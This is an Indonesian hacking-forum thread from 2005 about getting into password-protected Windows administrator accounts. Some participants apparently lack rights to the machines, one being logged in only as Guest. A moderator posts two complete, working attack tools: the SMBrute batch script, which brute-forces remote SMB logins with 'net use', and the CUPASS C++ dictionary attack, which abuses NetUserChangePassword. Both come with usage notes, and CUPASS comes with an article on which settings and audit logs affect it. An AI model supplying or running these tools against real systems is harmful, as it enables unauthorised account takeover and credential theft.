maaf sebelumnya krn say newbie.., begini saya ada masalah dlm memakai 3 langkah u/ reset password admin di XP, padahal saya udah coba ikuti 3 macam metode yg ada di forum ini antara lain :
1. metode yg pake nge rename taskmgr.exe jadi logon.scr = N' tdk berhasil krn di saya berada dlm login "Guest" shg akses u/ copy dan del tidak bisa dilakukan. kedua dlm registrynya jg tidak saya temukan hive autoadminlogon.
2. pake metode menol-kan jam Bios, jd 00:00:00 trus ctrl+F9 jg tdk bisa krn CTRL+F9 pada kompie saya IBM asli dgn XP sp1 tidak berfungsi.
3. metode Boot from floppy dgn tujuan merename file SAM, juga tdk berfungsi. krn partisi HD saya adalah Full NTFS. bukan FAT. saya kira cara itu cuma berlaku utk partisi FAT32 saja.

akhirnya saya coba tempuh dgn Boot pake NTFS boot loader, yg bisa membaca NTFS, saya bisa mengcopy file saya yg ada diLogin Administrator yg terpassword, namun tetap tdk bisa masuk sebagai administrator.

mohon pencerahannya, ... trims... :(

 
 
MAS 
Juru Kunci


Helped: 91 times
Age: 44
Joined: 16 Jan 2005
Posts: 15557
Location: Jakarta-Purwokerto PP
Posted: Fri Sep 23, 2005 4:08 pm   

1.yup anda bener,krn itu tak bisa pada pd guest logon.

2.ganti keyboard nya donk....rekan laen ada yg mencoba dan suskese.saya jamin itu.

3.tak bener tuh,kata siapa itu jnya pd FAT32 aja.coba deh baca2 pd link url aslinya mk akan lbh jelas bahwa itu bisa utk semua jenis partisi.

atau....pakai cara ini

1.download dan pakai MiniPE spt di skrinsut tsb

2.pakai Hiren BootCD or make 911 CD yg or bbrp recovery CD linux yg di bahas di bbrp thread disini.ada dan semua berhasil no problem kok.

_________________
tested
 
 
Andrean
baru ng-Oprek


Joined: 18 Sep 2005
Posts: 10
Posted: Sat Sep 24, 2005 5:53 pm   

:) akhirnya gue pake SAMinside aja dech.. bisa tuh bro

hehe... tp masih penasaran ama yg boot floppy nih beneran,
Bootnya pake NTFSDos ya.. (bukan pake boot dos biasa)

thanks all ..

 
 
MAS 
Juru Kunci


Helped: 91 times
Age: 44
Joined: 16 Jan 2005
Posts: 15557
Location: Jakarta-Purwokerto PP
Posted: Sun Sep 25, 2005 10:22 am   

betuuul mas....bedanya yg SAMinside dgn bikinan Peter tsb adl "syskey" apa tuh ? sdh dibahas di atas dengan gamblang yaitu ttg proteksi LMHash dan NTHash...

jd bukan krn programnya yg gak isa buka tp proteksi tsb sdh diaktipkan mll regedit shg "pencurian" pwd yg ada di file sam ndak isa dilakukan perubahan apapun !!!

klo SAMinside kan hanya "ngeliat bin ngintip" apa isinya password tsb kan ???

_________________
tested
 
 
MAS 
Juru Kunci


Helped: 91 times
Age: 44
Joined: 16 Jan 2005
Posts: 15557
Location: Jakarta-Purwokerto PP
Posted: Wed Sep 28, 2005 8:07 pm   

ok deh ini cara yg mungkin ditunggu .... yaitu nyari password over the network...!!!

SMBrute

Some folks on a forum I frequent ( http://www.thebroken.org ) asked about brute forcing Windows passwords remotely. Brutus (http://www.hoobie.net/brutus/) can do it, but I've had problems with it's reliability against SMB shares. Here's a little batch script I wrote that uses the Windows 2000/XP's "NET" command to find the password for a given account. I cribbed my password list from the folks that wrote Cain and Able (http://www.oxid.it/) but you can use any list you want. Download script and Cain's password file from http://www.irongeek.com/downloads/smbrute.zip. This is a very crude way to get the password to a remote Windows box, and if anyone audits the logs they will see a lot of failed login attempts. Be careful how you use this script as many systems are set up so that they lock accounts after too many failed login attempts.

Usage: smbrute machinename local-account-to-crack

Code "SMBrute.bat":

@echo off
echo SMBrute Script, Written by Irongeek: http://www.irongeek.com
echo Usage: smbrute machinename local-account-to-crack
echo Output: log.txt(debugging log) and output.txt (Holds password and machine name)
echo Stuff: make sure that you have a text file with your word list called
echo "wordlist.txt" in the same working directory.
if "%1"=="" goto end
if "%2"=="" goto end
del log.txt
FOR /F "tokens=1" %%i in (wordlist.txt) do ^
echo %%i && ^
net use \\%1\ipc$ %%i /u:%1\%2 2>>log.txt && ^
echo %time% %date% >> outfile.txt && ^
echo \\%1\ipc$ acct: %2 pass: %%i >> outfile.txt && goto end
:end
echo *****Done*****


Comments:

Don't show the commands we are running, just to make it pretty
Print out how to use the script.


Tell the user to put the word list in the same directory as the script.
Make sure the user gives input.

Delete the old log file.
Loop until the end of the password list file.
Print the current password attempt to the screen.
Use the "NET USE" command to try and start a session.
Write valid passwords to the output file.


Your done.


*do at ur own risk! for educational purposes only*

_________________
tested
 
 
MAS 
Juru Kunci


Helped: 91 times
Age: 44
Joined: 16 Jan 2005
Posts: 15557
Location: Jakarta-Purwokerto PP
Posted: Mon Nov 14, 2005 9:18 am   

ada lagi neeeh...namanya "windowskey" file nya cuman kurang dr 10mb.asal usul url dlsbnya ada di skrinsut....
_________________
tested
 
 
MAS 
Juru Kunci


Helped: 91 times
Age: 44
Joined: 16 Jan 2005
Posts: 15557
Location: Jakarta-Purwokerto PP
Posted: Mon Nov 21, 2005 6:09 pm   

ada lagiiii...namanya CUPASS bisa dicari di THC (googling aja yak) nah apa n gimana CUPASS itu bekerja silahken baca2 dulu disini....


----| INTRODUCTION



Microsoft has a known problem in Windows NT 4, that enables an attacker
to change the password of any user under special/default circumstances.


The same problem reappeared in Windows 2000 some days ago. The flaw exists
in Microsofts implementation of the NetUserChangePassword function.


These facts inspired me to write this article and CUPASS, a simple tool
that starts a dictionary attack against user accounts.


In this article I want to discuss all things worth knowing about the
NetUserChangePassword problem.


Have fun while reading this article...


Doc Holiday /THC




----| THE PASSWORD CHANGE PROTOCOLS


As a little background I will tell you something about the possibilites
to change a password in a Windows NT/W2K environment.


Windows 2000 supports several protocols for changing passwords which
are used under different circumstances.


These protocols are


- NetUserChangePassword protocol (we will call it NUCP)
- NetUserSetInfo protocol
- Kerberos change-password protocol
- Kerberos set-password protocol
- LDAP write-password attribute (presumes 128Bit SSL)
- XACT-SMB protocol (for LAN Manager compatibility)


Because there is a flaw in Microsofts implementation of the NUCP protocol,
we will have a deeper look at this one.



----| PROTOCOL ELECTION


We can see that there are a lot of protocols for changing passwords in an
Microsoft environment. Now I will show in which cases the NUCP is used:


case 1
------


If a user changes his password by pressing CTRL+ALT+DELETE and pressing the
"Change Password" button, the NUCP protocol is used, if the target is a
domain or the local member server or workstation.


If the target is a Kerberos realm, the Kerberos change-password protocol is
used instead of NUCP.


case 2
------


If a change password request is initiated from an Windows NT 3.x or NT 4
machine, the NUCP and/or NetUserSetInfo protocols are used.


case 3
------


If a program uses the NUCP method on the Active Directory Services
Interface (ADSI), the IaDSUser interface first tries to change the
password with the LDAP protocol, and then by using the NUCP method.




----| NUCP FUNCTION CALL


At this time we know that a lot of ways exist to change a users
password. We also know in which cases NUCP is used.


Now we want to have a little look at the function NetUserChangePassword
itself. (More detailed information can be found at Microsoft's SDK!)



Prototype
---------


The prototype of the NetUserChangePassword function is defined in
"lmaccess.h", and looks as follows:



NET_API_STATUS NET_API_FUNCTION
NetUserChangePassword (
IN LPCWSTR domainname OPTIONAL,
IN LPCWSTR username OPTIONAL,
IN LPCWSTR oldpassword,
IN LPCWSTR newpassword
);



The parameters are explained consecutively:



Parameters
----------


->domainname
----------


Pointer to a null-terminated Unicode string that specifies the name of a
remote server or domain.


->username
--------


Pointer to a null-terminated Unicode string that specifies a user name.


->oldpassword
-----------


Pointer to a null-terminated Unicode string that specifies the user's
old password on the server or domain.


->newpassword
-----------


Pointer to a null-terminated Unicode string that specifies the user's new
password on the server or domain.



Return values
-------------


The return values are defined in "LMERR.H" and "WINERROR.H".


With a deeper look in this files we can see that if the function was executed
with success, the return value is 0 (zero) btw. NERR_Success.



The most important error values are:


->ERROR_ACCESS_DENIED (WINERROR.H)
--------------------------------


Access is denied ;)


If the target is a NT Server/Domain Controller, and the
option "User Must Log On in Order to Change Password" is enabled,
this error code is the result of CUPASS. The password could
not be guessed :(


If the target is a W2K domain controller with AD installed,
and the EVERYONE group is removed from the group
"Pre-Windows 2000 compatible access", than this error code
is an result of NUCP.


In some cases this means the right password was guessed by
CUPASS, but could not be changed because of insufficient
permissions on the corresponding AD object.



->ERROR_INVALID_PASSWORD (WINERROR.H)
-----------------------------------


The guessed password (oldpassword) was invalid



->ERROR_ACCOUNT_LOCKED_OUT (WINERROR.H)
-------------------------------------


The account is locked due to many logon tries.



->ERROR_CANT_ACCESS_DOMAIN_INFO (WINERROR.H)
------------------------------------------


Indicates a Windows NT Server could not be contacted or that
objects within the domain are protected such that necessary
information could not be retrieved.



->NERR_UserNotFound (LMERR.H)
---------------------------


The useraccount could not be found on the given server.



->NERR_NotPrimary (LMERR.H)
-------------------------


The operation is only allowed on the PDC. This appears e.g. if
you try to change passwords on a BDC.



This return values are evaluated by CUPASS. For all others, the numeric
value will be shown, and you can simply have a look at this files for
the meaning of the errorcode.




MORE DETAILS ON NUCP API CALL
-----------------------------


The NUCP function is only available on Windows NT and Windows 2000
platforms.


As part of the LanMan-API the NUCP function is UNICODE only!!!
This makes the programming a little bit harder, but not impossible :)


UNICODE on Windows is an topic for itself, and we dont want to talk more
about it here. Have a look at Microsofts msdn webpage or Charles
Petzolds book about Windows programming, if you are interested in this
topic.


For a successfull usage of NUCP, you have to link your program with the
"Netapi32.lib" library!




----| REQUIRED PERMISSIONS FOR NUCP


NUCP is part of the Microsoft network management functions.
The management functions consists of different groups like
NetFileFunctions, ScheduleFunctions, ServerFunctions, UserFunctions etc.


These functions are again splitted in Query Functions and Update Functions.
Whilst query functions just allow to query informations, the update
functions allow changes on objects.


An example for a query function is e.g the NetUserEnum function which
provides information about all user accounts on a server.


An example for an update function is the NetUserChangePassword function
which changes the password of a user account :)


Its easy to imagine, that query functions need less permissions than update
functions for beeing executed.



Lets have a look what permissions are needet:



WINDOWS NT
----------


The query functions like NetGroupEnum, NetUserEnum etc. and can be
executed by all authenticated users.


This includes Anonymous users, if the RestrictAnonymous policy setting
allows anonymous access.


On a Windows NT member server, workstation or PDC, the
NetUserChangePassword function can only be (successfull) executed by
Administrators, Account Operators or the user of the account, if the option
'User Must Log On in Order to Change Password' for this user is enabled.


If 'User Must Log On in Order to Change Password' is not enabled, a user can
change the password of any other user, as long he knows the actual password.



WINDOWS 2000
------------


The query functions like NetGroupEnum, NetUserEnum etc. can be executed by
all authenticated users. This includes Anonymous users, if the
RestrictAnonymous policy setting allows anonymous access.


On a W2K member server or workstation the NetUserChangePassword function
should only be (successfully) executable by Administrators, Account
Operators or the user of the account.


That this isn't the case, can be shown with CUPASS, because here is the
flaw that Microsoft made with his implementation of NetUserChangePassword.


On W2K member servers and workstations, the NetUserChangePassword function
can be successfully executed by any user who knows the current password of
the attacked user account.



( For your information:


The option 'User Must Log On in Order to Change Password' has been removed
>from W2K! )



On a W2K domain controller with Active Directory, access to an object is
granted based on the ACL of the object (Because W2K with installed AD
stores the user passwords in the AD in contrast to NT 3.x/4).


Network management query functions are permitted to all authenticated
users and the members of the group "Pre-Windows 2000 compatible access"
by the default ACL's.


Theoretical Network Management Update functions like NUCP are only
permitted to Administrators and Account Operators.


That this is not the case, can also be shown with CUPASS.


CUPASS works fine if AD is installed on the target system.


If the "everyone" group is removed from the
"Pre-Windows 2000 compatible access" group, the result of CUPASS will
be Errorcode 5, which means ACCESS_DENIED!.


My research shows that anyhow the password is guessed by CUPASS, but
can not be changed because of insufficient permissions on the AD object!



----| ANONYMOUS CONNECT


There is something I didn't talk about much, the Anonymous User Problem,
also known as the NULL-User problem.


Lets have a short look at how the Anonymous security settings will take affect
to the NUCP problem:


-> W2K
---


The value Data of the following registry value regulates the behaviour
of the operating system regarding to the NULL USER CONNECT.


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA
Value: RestrictAnonymous
Value Type: REG_DWORD


If RestrictAnonymous is set to 0 (zero), which is the default setting,
CUPASS will work properly.


If RestrictAnonymous is set to 1, what means the enumeration of SAM
accounts and names is not allowed, CUPASS will work properly.

If RestrictAnonymous is set to 2, what means no access without explicit
anonymous permissions, there is no possibility to change the password
with NUCP :(

Because the value 2 has comprehensive consequences to the behaviour of
the windows environment (e.g. Browser service will not work properly,
netlogon secure channels could not be established properly by member
workstations etc..) it is rare used.


These settings are the same on W2K member server and W2K DC with AD!



-> NT4
---

The value Data of the following registry value regulates the behaviour
of the operating system regarding to the NULL USER CONNECT.


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA
Value: RestrictAnonymous
Value Type: REG_DWORD


Converse to W2K there are only two valid values 0 (zero) and 1 for
RestrictAnonymous.


If RestrictAnonymous is set to 0 (zero), which is the default setting,
CUPASS will work properly.


If RestrictAnonymous is set to 1, what means the enumeration of SAM
accounts and names is not allowed, CUPASS will work properly.






COMMON
------


The process that calls the NetUserChangePassword function in some cases
must have the SE_CHANGE_NOTIFY_NAME privilege
(except for system account and members of the local Administrator group).
Per default this privilege is enabled for every account, but can be
disabled by the administrator.


SE_CHANGE_NOTIFY_NAME could not be found at the privileges,
because it is called "Bypass traverse checking"!


This is an declarative from Microsoft. I tried it, but I didn't find a case
in that this right was necessary to execute the NUCP function call.




----| POLICY AND LOGGING


I will have a look for the policy settings, that will take affect to the
NUCP problem.



ACCOUNT POLICIES
----------------


->PASSWORD POLICY
---------------

The settings "Enforce password history" and "Minimum password age"
will take effect to the result of CUPASS, in the way that CUPASS can't
"realy" change the password, and the error code 2245 will result.

But this doesn't matter, because we know the "old" password at this time,
and CUPASS just tried to replace the "old" password with the "old"
password again.



->ACCOUNT LOGOUT POLICY
---------------------

Account lockout treshold
------------------------


The settings "Account lockout duration" and
"Reset Account lockout after ..." are only relevant if the
"Account lockout treshold" ist set to any value >0.


If the treshold is set, than this takes affect to the work of CUPASS,
because all attempts of CUPASS exceeding the treshold will lead to an
account lockout :(


However the Logout Policy ist not valid for the Administrator on NT4
environments, until the NT Reskit tool "Passprop" is used!
In this case even the Administator account will be locked
for network logons!


If we start CUPASS against any account of a W2K server or a W2K domain
controller with AD, this account is locked out, and even the
Administrator account is marked as "Account is locked out", too !


But it is still possible for the Administrator account to log on
interactive on the machine!







AUDIT POLICY
------------


Lets have a look which auditing events have to enabled, to see an
CUPASS attack in the security logs of the target machine.



Audit Account Management
------------------------


If the setting "Audit Account Management" is enabled (success/failure),
an entry with the ID 627 appears in in the security log.


This entry contains all necessary datas for the administrator :(
These e.g. are: Date, Time, Target Account Name, Caller User Name etc.



Audit account logon events
--------------------------


Surprisingly for some administrators, there appears no log entry if
the settings "Audit account logon events" or "Audit logon events"
are enabled, if the attack goes to the local machine.


This is e.g. the case if you want to guess the local administrator
password of your machine.


If the CUPASS attack comes from remote, log entries ID 681 and ID 529
occures.



Audit Object Access
-------------------

If this type of auditing is enabled, and the attack goes to the
local machine, an logfile entry with the ID 560 and 562 appears.


ID 560 tells us that someone opened the object
"Security Account Manager" whilst 562 tells us something like
"Handle closed"...



Maybe there occure some more logfile entries with other ID's, but these
ones listed above are the ones I found while testing CUPASS.


So test CUPASS on your own environment and have a look into your logfiles!




----| LAST WORDS


I hope this article could give you a little overview about the
NetUserChangePassword problem, and Microsoft's inconsequent implementation
of security and function calls.


This article could not treat this topic concluding, because there are
so many different situations and configurations that I could not test
in my short sparetime :)



----| GREETS


Greets to Van Hauser who inspired me for this release, ganymed, mindmaniac
and all the other members from THC, VAX who gives me a lift to HAL2001,
the guys from TESO, Seth, Rookie and all the other people knowing me...


The biggest THANX are going to my wife, who missed me nearly the whole
weekend while I was writing this article!

Ok, have a nice day and lets meet and party at HAL2001 :)



Code:
<++> cupass.cpp !a10c7302
/*
 * CUPASS v1.0 (c) 2001 by Doc Holiday / THC <[email protected]>
 * http://www.hackerschoice.com
 *
 * Dictionary Attack against Windows Passwords with NetUserChangePassword.
 * Do only use for legal purposes.
 *
 * Compiled and tested on Windows NT/W2K - runs not on Win9x!!
 * Compiled with VC++ 6.0
 *
 */


#define UNICODE 1
#define _UNICODE 1


#include <windows.h>
#include <lmaccess.h>
#include <stdio.h>
#include <wchar.h>


#pragma comment( lib, "netapi32.lib" )



void wmain( int argc, wchar_t *argv[] )
{
        wchar_t *hostname = 0;
        wchar_t *username = 0;
        wchar_t *dictfile = 0;
        wchar_t myChar[256];
        NET_API_STATUS result;
        FILE *stream;
        LPWSTR oldpassword;


        if (argc != 4)
        {
        wprintf (L"\nMissing or wrong parameters!\n");
            wprintf (
               L"\nUsage: cupass \\\\hostname username dictionaryfile\n");
            exit(1);
        }


        hostname = argv[1];
        username = argv[2];
        dictfile = argv[3];


    if (wcsncmp(hostname, L"\\\\",2 )!=0)
        {
            wprintf (L"\nups... you forgot the double backslash?");
            wprintf (
                L"\nUsage: cupass \\\\hostname username dictionaryfile\n");
            exit(1);
        }


  if( (stream  = _wfopen( dictfile, L"r" )) == NULL )
        {
      wprintf( L"\nups... dictionary %s could not be opened", dictfile );
      wprintf (L"\nUsage: cupass \\\\hostname username dictionaryfile\n");
        }
   else
   {
       
        wprintf (L"\n*** CUPASS 1.0 - Change User PASSword - by Doc Holiday/THC (c) 2001 ***\n");
        wprintf (L"\nStarting attack .....\n");
        wprintf (L"\nTarget: %s ", hostname);
        wprintf (L"\nUser: %s\n ", username);


        while( !feof( stream ) )
        {
          fgetws (myChar, 256,stream);


          if (myChar[wcslen(myChar)-1] == '\r') myChar[wcslen(myChar)-1] = '\0';
          if (myChar[wcslen(myChar)-1] == '\n') myChar[wcslen(myChar)-1] = '\0';


          oldpassword = myChar;
   
          wprintf( L"\nTrying password %s \n", oldpassword );
               
          result = NetUserChangePassword( hostname, username,oldpassword, oldpassword );
               
          switch (result)
          {
                case 0:
                        wprintf( L"GOTCHA!! Password was changed\n" );
                        wprintf( L"\nPassword from user '%s' is '%s'\n", username, oldpassword);
                        fclose (stream);
                        exit (1);
                        break;
                       
                case 5: //ERROR_ACCESS_DENIED
                        wprintf (L"Attempt failed -> ERROR_ACCESS_DENIED - But password could be %s\n", oldpassword);
                        fclose (stream);
                        exit(1);
                        break;
                       
                case 86: //ERROR_INVALID_PASSWORD
                        wprintf( L"Attempt failed -> Incorrect password\n" );
                        break;
                       
                case 1351: //ERROR_CANT_ACCESS_DOMAIN_INFO
                        wprintf (L"Attempt failed -> Can't establish connection to Host %s\n",hostname);
                        fclose (stream);
                        exit(1);
                        break;


                case 1909: //ERROR_ACCOUNT_LOCKED_OUT
                        wprintf (L"Attempt failed -> Account locked out\n");
                        fclose (stream);
                        exit(1);
                        break;


                case 2221: //NERR_UserNotFound)
                        wprintf (L"Attempt failed -> User %s not found\n", username);
                        fclose (stream);
                        exit(1);                   
                        break;
                       
                case 2226://NERR_NotPrimary
                        wprintf (L"Attempt failed -> Operation only allowed on PDC\n");
                        break;


                case 2245:
                        wprintf (L"GOTCHA!! Password is '%s' , but couldn't be changed to '%s' due to password policy settings!\n", oldpassword, oldpassword);
                        fclose(stream);
                        exit(1);
                        break;


                default:
                        wprintf( L"\nAttempt failed :( %lu\n", result );
                        fclose(stream);
                        exit(1);
                        break;
                }
        }
        fclose (stream);
   }   
}
<--> end cupass.cpp

|=[ EOF ]=---------------------------------------------------------------=|


 
 
opique
baru ng-Oprek


Joined: 07 Dec 2005
Posts: 16
Location: Bekasi
Posted: Wed Dec 07, 2005 2:21 pm   Udah dicoba

MAS
Bos..ane dah coba yg override user agent, tapi gak ada sinyal apa2..cuma sekelebatan aja keliatan eksekusi a.bat-nya trus pas logoff user, tetep aja gak berubah. Trus coba2 masuk ke regedit ngedit AutoAdminLogon gak bisa juga.
Trus coba yang dari BIOS..nah kan kompie-nya Compaq jadi BIOS-nya ya Compaq, coba atur jam jai "00:00" udah pas teken Ctrl+F9 enter gak ada diminta password...duh binun bangget, kalo mo pake miniPE download-nya dimana Bos?? nyari di download.com gak ada tuh...tengkyu
Btw...ini windows-na Windows 2000 profesional Bos

_________________
Opique Dharma
--from Depok with love--
 
 
MAS 
Juru Kunci


Helped: 91 times
Age: 44
Joined: 16 Jan 2005
Posts: 15557
Location: Jakarta-Purwokerto PP
Posted: Wed Dec 07, 2005 2:24 pm   

yg ngambil dr sini http://home.eunet.no/%7Epnordahl/ntpasswd/ dah dipraktekin...? gak ada msl mau w2k/w2k3/xp ya sama ajah
_________________
tested
 
 
opique
baru ng-Oprek


Joined: 07 Dec 2005
Posts: 16
Location: Bekasi
Posted: Fri Dec 09, 2005 5:44 pm   

MAS wrote:
yg ngambil dr sini http://home.eunet.no/%7Epnordahl/ntpasswd/ dah dipraktekin...? gak ada msl mau w2k/w2k3/xp ya sama ajah


Bos...ane dah coba yang ini, sakses..thx. Tapi...ada tapinya neh Bos...semua username yang ada jadi nggak iso dipake, ilang semua...yang ada ya cuma user name default tanpa password. Gawat juga kalo Si Bos mo pake username do'i nggak ada.
Apa emang gini cara kerjanya...apa ane yang salah prosedur ya Bos?
Mohon pencerahan-nya..thxalot

_________________
Opique Dharma
--from Depok with love--
 
 
MAS 
Juru Kunci


Helped: 91 times
Age: 44
Joined: 16 Jan 2005
Posts: 15557
Location: Jakarta-Purwokerto PP
Posted: Sat Dec 10, 2005 10:04 pm   

yup....kan sdh diterangin hal tsb akan menghilangkan bbrp folder yg di set private,dlm hal tsb mk SYSKEY di folder tsb tetep bisa di dekrip utk dibuka.coba liat2 ttg SAMDUMP,WINDUMP or bahkan SAMINSIDE....gutlak deh.
_________________
tested
 
 
MAS 
Juru Kunci


Helped: 91 times
Age: 44
Joined: 16 Jan 2005
Posts: 15557
Location: Jakarta-Purwokerto PP
Posted: Mon Dec 12, 2005 9:18 am   

ok...banyak org mencoba trik memakai syslinux bootable bikinan Peter Pnordahl tsb,banyak yg berhasil dan yg gagal jg banyak,sebagai langkah utk lebih mempermudah lg dan lbh familiar dgn windows,disini saya upload lagi sebuah "barang langka" betul2 langka karena password resseter ini memakai interface windows dan amat familiar....silahkan dicoba2.

Code:
http://rapidshare.de/files/9017508/windowskey.rar


password : oprekpc

maap...gagal or brasil tulung bagi2 cerita yah....hihihihi.

_________________
tested
 
 
doi_cucok
belajar ng-Oprek



Joined: 06 Jan 2006
Posts: 113
Location: Cyber Space (^_-)b
Posted: Sat Mar 04, 2006 6:52 am   

Kereeeeeeeeeennn.......... banyak yang belum gue tau dari semua tehnik MAS!!! mantab euy....!!! :lol:
_________________
===========================
Peace, Love and Gaul,
Doi Cucok (-_^)b
http://www.friendster.com/riski
===========================
 
 
Display posts from previous:   
Reply to topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
Add this topic to your bookmarks
Printable version

Jump to:  



Powered by phpBB modified by Przemo © 2003 phpBB Group
Template modified by Mich@³
Customized by OprekPC @ 2007
Page generated in 0.95 second. SQL queries: 13